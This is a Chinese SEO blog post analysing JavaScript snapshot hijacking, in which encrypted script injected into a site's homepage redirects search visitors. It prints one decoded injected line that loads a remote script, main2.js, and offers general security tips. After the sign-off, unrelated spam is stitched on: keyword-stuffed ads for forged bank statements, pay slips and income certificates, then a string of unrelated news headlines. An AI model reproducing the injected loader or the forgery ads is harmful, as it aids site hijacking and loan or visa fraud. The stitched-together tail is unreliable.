站长同学们经常遇到js快照劫持的问题,对网站的优化带来极大的影响。对于大多数新手站长来说js快照劫持,束手无策。今天无忧老师为大家进行一轮深度的解析。
一,js快照劫持示例
js快照劫持演示图,记录的是网站跳转的。
一个是百度搜索快照劫持演示。另一个是搜狐搜索快照劫持演示。
JS快照劫持,百度搜索演示图
JS快照劫持,搜狐搜索演示图
二,分析js快照劫持代码
经分析,网站首页被植入了恶意了代码,而且是多次加密JS代码。
此段代码就是添加在网站首页的JS,而且属于了加密了的代码,一般看不出什么猫腻。
三,加密JS层层分析
接下来进行JS反向解析分析。可以使用站长工具在线分析:chinaz/js.aspx
解析后,可以看到真面目,这段代码。
script type=“text/javascript”
document.writeln(“<script src=5121188/main2.js></script>”);/script
打开这个main2.js可以看到一段落代码。
攻击者真的多有精力,层层加密啊。怪不得一般站长根本无法发现。
然后再进行解密。
被加密的JS恶意代码解析图
这下大家应该清楚了,攻击者对代码进行了3次的加密再调用,来实现百度快照的JS劫持跳转。
四,网站安全建议
网站安全一直是一个让站长运营者头痛的问题,没有百分百安全的网站,只有一断的进行维护和优化,做到定期备份,定期检查,最大程度的杜绝网站被黑被劫持的风险。希望各位同学清楚并且牢记在心。
最后,在我的课程中也经常会分享一些网站安全小知识,请大家SEO研究中心,会不断的分析干货教程和文章。
代做工资流水公司遵义做工资流水账单湛江代开车贷工资流水商丘代做企业贷流水信阳入职银行流水开具湘潭流水账单办理长春流水柳州查企业银行流水菏泽工资证明样本宿迁收入证明多少钱铜陵查询转账银行流水南宁个人流水样本新乡查签证工资流水宁波薪资银行流水样本江门签证银行流水 办理昆明做流水上海工作收入证明样本南阳收入证明费用信阳签证银行流水 打印咸阳做车贷流水青岛企业流水打印公司廊坊自存流水费用昆明薪资流水单代办沧州入职银行流水代做成都办签证流水潮州银行流水账单价格广州房贷流水打印南宁房贷流水代办海口代做工作收入证明泰安代做自存银行流水江门打印个人工资流水香港通过《维护国家安全条例》两大学生合买彩票中奖一人不认账让美丽中国“从细节出发”19岁小伙救下5人后溺亡 多方发声卫健委通报少年有偿捐血浆16次猝死汪小菲曝离婚始末何赛飞追着代拍打雅江山火三名扑火人员牺牲系谣言男子被猫抓伤后确诊“猫抓病”周杰伦一审败诉网易中国拥有亿元资产的家庭达13.3万户315晚会后胖东来又人满为患了高校汽车撞人致3死16伤 司机系学生张家界的山上“长”满了韩国人?张立群任西安交通大学校长手机成瘾是影响睡眠质量重要因素网友洛杉矶偶遇贾玲“重生之我在北大当嫡校长”单亲妈妈陷入热恋 14岁儿子报警倪萍分享减重40斤方法杨倩无缘巴黎奥运考生莫言也上北大硕士复试名单了许家印被限制高消费奥巴马现身唐宁街 黑色着装引猜测专访95后高颜值猪保姆男孩8年未见母亲被告知被遗忘七年后宇文玥被薅头发捞上岸郑州一火锅店爆改成麻辣烫店西双版纳热带植物园回应蜉蝣大爆发沉迷短剧的人就像掉进了杀猪盘当地回应沈阳致3死车祸车主疑毒驾开除党籍5年后 原水城县长再被查凯特王妃现身!外出购物视频曝光初中生遭15人围殴自卫刺伤3人判无罪事业单位女子向同事水杯投不明物质男子被流浪猫绊倒 投喂者赔24万外国人感慨凌晨的中国很安全路边卖淀粉肠阿姨主动出示声明书胖东来员工每周单休无小长假王树国卸任西安交大校长 师生送别小米汽车超级工厂正式揭幕黑马情侣提车了妈妈回应孩子在校撞护栏坠楼校方回应护栏损坏小学生课间坠楼房客欠租失踪 房东直发愁专家建议不必谈骨泥色变老人退休金被冒领16年 金额超20万西藏招商引资投资者子女可当地高考特朗普无法缴纳4.54亿美元罚金浙江一高校内汽车冲撞行人 多人受伤